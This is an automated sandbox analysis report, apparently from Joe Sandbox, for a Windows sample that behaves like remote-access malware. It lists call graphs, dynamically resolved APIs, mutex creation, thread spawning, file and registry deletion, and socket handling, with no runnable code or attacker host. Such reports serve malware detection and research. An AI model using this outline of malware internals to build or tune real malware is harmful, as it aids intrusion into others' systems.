47544->47793 47547 40dd54 47549 40dd81 47547->47549 47794 41bec0 86 API calls ___scrt_fastfail 47547->47794 47548 40dc5c 47548->47522 47785 401d64 22 API calls 47548->47785 47795 401f66 28 API calls 47549->47795 47552 40dc7e 47786 41ae18 28 API calls 47552->47786 47553 40dd65 CreateThread 47553->47549 47870 41c97f 10 API calls 47553->47870 47556 40dd96 47796 401f66 28 API calls 47556->47796 47557 40dc87 47787 40e219 109 API calls 47557->47787 47560 40dda5 47797 41a696 79 API calls 47560->47797 47561 40dc8c 47561->47522 47563 40dc93 47561->47563 47563->47459 47564 40ddaa 47798 401d64 22 API calls 47564->47798 47566 40ddb6 47799 401d64 22 API calls 47566->47799 47568 40ddcb 47800 401d64 22 API calls 47568->47800 47570 40ddeb 47801 43a5f7 39 API calls _strftime 47570->47801 47572 40ddf8 47802 401d64 22 API calls 47572->47802 47574 40de03 47803 401d64 22 API calls 47574->47803 47576 40de14 47804 401d64 22 API calls 47576->47804 47578 40de29 47805 401d64 22 API calls 47578->47805 47580 40de3a 47581 40de41 StrToIntA 47580->47581 47806 409517 142 API calls _wcslen 47581->47806 47583 40de53 47807 401d64 22 API calls 47583->47807 47585 40de5c 47587 40dea1 47585->47587 47808 43361d 22 API calls 3 library calls 47585->47808 47810 401d64 22 API calls 47587->47810 47589 40de71 47809 401d64 22 API calls 47589->47809 47591 40de84 47594 40de8b CreateThread 47591->47594 47592 40def9 47813 401d64 22 API calls 47592->47813 47593 40deb1 47593->47592 47811 43361d 22 API calls 3 library calls 47593->47811 47594->47587 47874 419138 102 API calls 2 library calls 47594->47874 47597 40dec6 47812 401d64 22 API calls 47597->47812 47599 40ded8 47604 40dedf CreateThread 47599->47604 47600 40df6c 47819 401d64 22 API calls 47600->47819 47601 40df02 47601->47600 47814 401d64 22 API calls 47601->47814 47604->47592 47871 419138 102 API calls 2 library calls 47604->47871 47605 40df1e 47815 401d64 22 API calls 47605->47815 47606 40df75 47607 40dfba 47606->47607 47820 401d64 22 API calls 47606->47820 47824 41a7b2 29 API calls 47607->47824 47611 40df33 47816 40c854 31 API calls 47611->47816 47612 40dfc3 47825 401e18 11 API calls 47612->47825 47613 40df8a 47821 401d64 22 API calls 47613->47821 47615 40dfce 47826 401e13 11 API calls 47615->47826 47619 40df46 47817 401e18 11 API calls 47619->47817 47620 40dfd7 CreateThread 47625 40e004 47620->47625 47626 40dff8 CreateThread 47620->47626 47872 40e54f 82 API calls 47620->47872 47621 40df9f 47822 43a5f7 39 API calls _strftime 47621->47822 47624 40df52 47818 401e13 11 API calls 47624->47818 47628 40e019 47625->47628 47629 40e00d CreateThread 47625->47629 47626->47625 47873 410f36 138 API calls 47626->47873 47633 40e073 47628->47633 47827 401f66 28 API calls 47628->47827 47629->47628 47875 411524 38 API calls ___scrt_fastfail 47629->47875 47631 40df5b CreateThread 47631->47600 47876 40196b 49 API calls _strftime 47631->47876 47632 40dfac 47823 40b95c 7 API calls 47632->47823 47831 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47633->47831 47636 40e046 47828 404c9e 28 API calls 47636->47828 47639 40e053 47829 401f66 28 API calls 47639->47829 47640 40e08b 47641 40e12a 47640->47641 47832 41ae18 28 API calls 47640->47832 47839 40cbac 27 API calls 47641->47839 47644 40e062 47830 41a696 79 API calls 47644->47830 47646 40e0a4 47833 412584 31 API calls 47646->47833 47648 40e12f 47840 413fd4 168 API calls _strftime 47648->47840 47649 40e067 47651 401eea 11 API calls 47649->47651 47651->47633 47653 40e0ba 47834 401e13 11 API calls 47653->47834 47655 40e0ed DeleteFileW 47656 40e0f4 47655->47656 47657 40e0c5 47655->47657 47835 41ae18 28 API calls 47656->47835 47657->47655 47657->47656 47659 40e0db Sleep 47657->47659 47659->47657 47660 40e104 47836 41297a RegOpenKeyExW RegDeleteValueW 47660->47836 47662 40e117 47837 401e13 11 API calls 47662->47837 47664 40e121 47838 401e13 11 API calls 47664->47838 47878 44244b 47666->47878 47669->47359 47670->47363 47671->47370 47672->47373 47673->47375 47674->47378 47675->47353 47677->47382 47678->47384 47683 44e959 47679->47683 47682 437a27 8 API calls 3 library calls 47682->47389 47686 44e972 47683->47686 47685 4336ea 47685->47387 47685->47682 47687 433d3c 47686->47687 47688 433d47 IsProcessorFeaturePresent 47687->47688 47689 433d45 47687->47689 47691 4341b4 47688->47691 47689->47685 47694 434178 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47691->47694 47693 434297 47693->47685 47694->47693 47695->47392 47697 44ddeb 47696->47697 47698 44dde2 47696->47698 47697->47396 47701 44dcd8 48 API calls 4 library calls 47698->47701 47700->47396 47701->47697 47703 41bd32 LoadLibraryA GetProcAddress 47702->47703 47704 41bd22 GetModuleHandleA GetProcAddress 47702->47704 47705 41bd5b 32 API calls 47703->47705 47706 41bd4b LoadLibraryA GetProcAddress 47703->47706 47704->47703 47705->47401 47706->47705 47843 41a64f FindResourceA 47707->47843 47711 40e192 ctype 47853 401f86 47711->47853 47714 401eef 11 API calls 47715 40e1b8 47714->47715 47716 401eea 11 API calls 47715->47716 47717 40e1c1 47716->47717 47718 43a89c _Yarn 21 API calls 47717->47718 47719 40e1d2 ctype 47718->47719 47857 406052 28 API calls 47719->47857 47721 40e205 47721->47403 47722->47405 47723->47407 47724->47409 47725->47411 47726->47413 47727->47418 47728->47422 47729->47425 47730->47429 47732 401efe 47731->47732 47734 401f0a 47732->47734 47865 4021b9 11 API calls 47732->47865 47734->47432 47737 4021b9 47735->47737 47736 4021e8 47736->47434 47737->47736 47866 40262e 11 API calls _Deallocate 47737->47866 47739->47440 47740->47442 47741->47444 47742->47447 47743->47454 47867 401e8f 47744->47867 47746 40bee1 CreateMutexA GetLastError 47746->47458 47747->47419 47748->47424 47749->47428 47751->47450 47752->47446 47753->47465 47754->47453 47755->47463 47756->47473 47757->47482 47758->47476 47759->47488 47760->47466 47761->47472 47762->47480 47763->47486 47764->47489 47765->47492 47766->47495 47767->47497 47768->47499 47769->47501 47770->47504 47771->47510 47772->47516 47773->47521 47774->47528 47775->47532 47776->47536 47777->47509 47778->47515 47779->47520 47780->47525 47781->47534 47782->47537 47783->47541 47784->47548 47785->47552 47786->47557 47787->47561 47788->47522 47789->47526 47790->47535 47791->47542 47792->47544 47793->47547 47794->47553 47795->47556 47796->47560 47797->47564 47798->47566 47799->47568 47800->47570 47801->47572 47802->47574 47803->47576 47804->47578 47805->47580 47806->47583 47807->47585 47808->47589 47809->47591 47810->47593 47811->47597 47812->47599 47813->47601 47814->47605 47815->47611 47816->47619 47817->47624 47818->47631 47819->47606 47820->47613 47821->47621 47822->47632 47823->47607 47824->47612 47825->47615 47826->47620 47827->47636 47828->47639 47829->47644 47830->47649 47831->47640 47832->47646 47833->47653 47834->47657 47835->47660 47836->47662 47837->47664 47838->47641 47839->47648 47869 419e99 104 API calls 47840->47869 47841->47471 47844 40e183 47843->47844 47845 41a66c LoadResource LockResource SizeofResource 47843->47845 47846 43a89c 47844->47846 47845->47844 47850 446b0f _strftime 47846->47850 47847 446b4d 47859 445364 20 API calls _free 47847->47859 47849 446b38 RtlAllocateHeap 47849->47850 47851 446b4b 47849->47851 47850->47847 47850->47849 47858 442210 7 API calls 2 library calls 47850->47858 47851->47711 47854 401f8e 47853->47854 47860 402325 47854->47860 47856 401fa4 47856->47714 47857->47721 47858->47850 47859->47851 47861 40232f 47860->47861 47863 40233a 47861->47863 47864 40294a 28 API calls 47861->47864 47863->47856 47864->47863 47865->47734 47866->47736 47868 401e94 47867->47868 47877 411637 62 API calls 47873->47877 47879 442457 _unexpected 47878->47879 47880 442470 47879->47880 47881 44245e 47879->47881 47902 444adc EnterCriticalSection 47880->47902 47914 4425a5 GetModuleHandleW 47881->47914 47884 442463 47884->47880 47915 4425e9 GetModuleHandleExW 47884->47915 47885 442515 47903 442555 47885->47903 47889 4424ec 47893 442504 47889->47893 47924 443485 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 47889->47924 47891 442532 47906 442564 47891->47906 47892 44255e 47926 4564a9 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 47892->47926 47925 443485 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 47893->47925 47894 442477 47894->47885 47894->47889 47923 4431ff 20 API calls _Atexit 47894->47923 47902->47894 47927 444b24 LeaveCriticalSection 47903->47927 47905 44252e 47905->47891 47905->47892 47928 447983 47906->47928 47909 442592 47912 4425e9 _Atexit 8 API calls 47909->47912 47910 442572 GetPEB 47910->47909 47911 442582 GetCurrentProcess TerminateProcess 47910->47911 47911->47909 47913 44259a ExitProcess 47912->47913 47914->47884 47916 442636 47915->47916 47917 442613 GetProcAddress 47915->47917 47918 442645 47916->47918 47919 44263c FreeLibrary 47916->47919 47921 442628 47917->47921 47920 433d3c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 47918->47920 47919->47918 47922 44246f 47920->47922 47921->47916 47922->47880 47923->47889 47924->47893 47925->47885 47927->47905 47929 4479a8 47928->47929 47933 44799e 47928->47933 47934 447184 47929->47934 47931 433d3c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 47932 44256e 47931->47932 47932->47909 47932->47910 47933->47931 47935 4471b4 47934->47935 47938 4471b0 47934->47938 47935->47933 47936 4471d4 47936->47935 47939 4471e0 GetProcAddress 47936->47939 47938->47935 47938->47936 47941 447220 47938->47941 47940 4471f0 __crt_fast_encode_pointer 47939->47940 47940->47935 47942 447241 LoadLibraryExW 47941->47942 47945 447236 47941->47945 47943 447276 47942->47943 47944 44725e GetLastError 47942->47944 47943->47945 47946 44728d FreeLibrary 47943->47946 47944->47943 47947 447269 LoadLibraryExW 47944->47947 47945->47938 47946->47945 47947->47943

                                                    Executed Functions

                                                    Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                    • API String ID: 384173800-625181639
                                                    • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                    • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                    • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                    • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                                                    Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                    • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                    • ExitProcess.KERNEL32 ref: 0044259E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                    • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                    • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                    • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                    Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                    • CloseHandle.KERNELBASE(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                    • closesocket.WS2_32(?), ref: 0040481F
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                    • String ID:
                                                    • API String ID: 3658366068-0
                                                    • Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                    • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                    • Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                    • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                                    Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
                                                    • _free.LIBCMT ref: 00446F8D
                                                    • _free.LIBCMT ref: 00446FB4
                                                    • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                    • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                    • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                    • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                    • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                    Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 45 447220-447234 46 447236-44723f 45->46 47 447241-44725c LoadLibraryExW 45->47 48 447298-44729a 46->48 49 447285-44728b 47->49 50 44725e-447267 GetLastError 47->50 51 447294 49->51 52 44728d-44728e FreeLibrary 49->52 53 447276 50->53 54 447269-447274 LoadLibraryExW 50->54 56 447296-447297 51->56 52->51 55 447278-44727a 53->55 54->55 55->49 57 44727c-447283 55->57 56->48 57->56
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                    • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                    • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                    • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                    • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                    Function 00447184 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 58 447184-4471ae 59 4471b0-4471b2 58->59 60 447219 58->60 61 4471b4-4471b6 59->61 62 4471b8-4471be 59->62 63 44721b-44721f 60->63 61->63 64 4471c0-4471c2 call 447220 62->64 65 4471da 62->65 68 4471c7-4471ca 64->68 67 4471dc-4471de 65->67 69 4471e0-4471ee GetProcAddress 67->69 70 447209-447217 67->70 71 4471cc-4471d2 68->71 72 4471fb-447201 68->72 73 4471f0-4471f9 call 4333b7 69->73 74 447203 69->74 70->60 71->64 76 4471d4 71->76 72->67 73->61 74->70 76->65
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004471E4
                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2279764990-3232713500
                                                    • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                    • Instruction ID: 3b3a260b8722ab3c424429fa82009fd7979b69f7a0747b894072712038533021
                                                    • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                    • Instruction Fuzzy Hash: C8110633A041619FAB229F28EC4095B7395FB803647168672FD19AB354D734EC4386E9
                                                    Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 78 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                    APIs
                                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                    • GetLastError.KERNEL32 ref: 0040BEF1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastMutex
                                                    • String ID: (CG
                                                    • API String ID: 1925916568-4210230975
                                                    • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                    • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                    • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                    • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                    Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 103 448716-448721 104 448723-44872d 103->104 105 44872f-448735 103->105 104->105 106 448763-44876e call 445364 104->106 107 448737-448738 105->107 108 44874e-44875f RtlAllocateHeap 105->108 112 448770-448772 106->112 107->108 109 448761 108->109 110 44873a-448741 call 4447d5 108->110 109->112 110->106 116 448743-44874c call 442210 110->116 116->106 116->108
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                    • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                    • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                    • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
                                                    Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 119 446b0f-446b1b 120 446b4d-446b58 call 445364 119->120 121 446b1d-446b1f 119->121 128 446b5a-446b5c 120->128 123 446b21-446b22 121->123 124 446b38-446b49 RtlAllocateHeap 121->124 123->124 125 446b24-446b2b call 4447d5 124->125 126 446b4b 124->126 125->120 131 446b2d-446b36 call 442210 125->131 126->128 131->120 131->124
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                    • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                    • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                    • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF

                                                    Non-executed Functions

                                                    Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                      • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
